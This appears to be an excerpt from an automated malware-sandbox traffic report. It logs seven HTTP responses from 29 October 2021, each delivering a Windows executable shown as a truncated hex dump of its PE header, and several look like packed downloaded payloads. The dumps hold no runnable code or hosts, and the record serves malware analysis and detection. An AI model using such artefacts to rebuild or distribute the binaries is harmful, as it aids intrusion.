                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 12:09:41 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 12:09:02 GMTETag: "54a00-5cf7cb1650dd7"Accept-Ranges: bytesContent-Length: 346624Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b5 ed f7 3e f1 8c 99 6d f1 8c 99 6d f1 8c 99 6d 9e fa 32 6d dd 8c 99 6d 9e fa 07 6d d3 8c 99 6d 9e fa 33 6d 71 8c 99 6d f8 f4 0a 6d f8 8c 99 6d f1 8c 98 6d 8f 8c 99 6d 9e fa 36 6d f0 8c 99 6d 9e fa 03 6d f0 8c 99 6d 9e fa 04 6d f0 8c 99 6d 52 69 63 68 f1 8c 99 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 16 a1 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 cc 03 00 00 c0 70 02 00 00 00 00 20 cb 01 00 00 10 00 00 00 e0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 74 02 00 04 00 00 10 4a 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 cf 03 00 64 00 00 00 00 60 73 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 73 02 90 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 bf 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 cb 03 00 00 10 00 00 00 cc 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 e0 03 00 00 16 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 61 6c 65 00 00 00 e5 02 00 00 00 50 73 02 00 04 00 00 00 e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 3c 00 00 00 60 73 02 00 3c 00 00 00 ea 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 01 00 00 a0 73 02 00 24 01 00 00 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 12:10:20 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 12:10:03 GMTETag: "92e00-5cf7cb5008bf2"Accept-Ranges: bytesContent-Length: 601600Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b5 ed f7 3e f1 8c 99 6d f1 8c 99 6d f1 8c 99 6d 9e fa 32 6d dd 8c 99 6d 9e fa 07 6d d3 8c 99 6d 9e fa 33 6d 71 8c 99 6d f8 f4 0a 6d f8 8c 99 6d f1 8c 98 6d 8f 8c 99 6d 9e fa 36 6d f0 8c 99 6d 9e fa 03 6d f0 8c 99 6d 9e fa 04 6d f0 8c 99 6d 52 69 63 68 f1 8c 99 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c0 ec 51 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 b0 07 00 00 c0 70 02 00 00 00 00 20 ae 05 00 00 10 00 00 00 c0 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 78 02 00 04 00 00 7a 4c 09 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 b2 07 00 64 00 00 00 00 40 77 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 77 02 98 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 a2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 ae 07 00 00 10 00 00 00 b0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 c0 07 00 00 16 00 00 00 b4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 75 78 61 74 00 00 e5 02 00 00 00 30 77 02 00 04 00 00 00 ca 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 3c 00 00 00 40 77 02 00 3c 00 00 00 ce 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 01 00 00 80 77 02 00 24 01 00 00 0a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:10:52 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 12:10:58 GMTServer: Apache/2.4.6 (CentOS) PHP/5.6.40Last-Modified: Fri, 29 Oct 2021 12:10:02 GMTETag: "d6200-5cf7cb4ef9326"Accept-Ranges: bytesContent-Length: 877056Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b5 ed f7 3e f1 8c 99 6d f1 8c 99 6d f1 8c 99 6d 9e fa 32 6d dd 8c 99 6d 9e fa 07 6d d3 8c 99 6d 9e fa 33 6d 71 8c 99 6d f8 f4 0a 6d f8 8c 99 6d f1 8c 98 6d 8f 8c 99 6d 9e fa 36 6d f0 8c 99 6d 9e fa 03 6d f0 8c 99 6d 9e fa 04 6d f0 8c 99 6d 52 69 63 68 f1 8c 99 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ed ff a0 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 e4 0b 00 00 c0 70 02 00 00 00 00 20 e3 09 00 00 10 00 00 00 00 0c 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 7c 02 00 04 00 00 6a 61 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 e7 0b 00 64 00 00 00 00 80 7b 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 7b 02 94 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 d7 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 e3 0b 00 00 10 00 00 00 e4 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 00 0c 00 00 16 00 00 00 e8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 75 63 69 00 00 00 e5 02 00 00 00 70 7b 02 00 04 00 00 00 fe 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 3c 00 00 00 80 7b 02 00 3c 00 00 00 02 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 01 00 00 c0 7b 02 00 24 01 00 00 3e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:18 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Sat, 30 Oct 2021 12:11:18 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:18 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Sat, 30 Oct 2021 12:11:18 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:18 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Sat, 30 Oct 2021 12:11:18 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
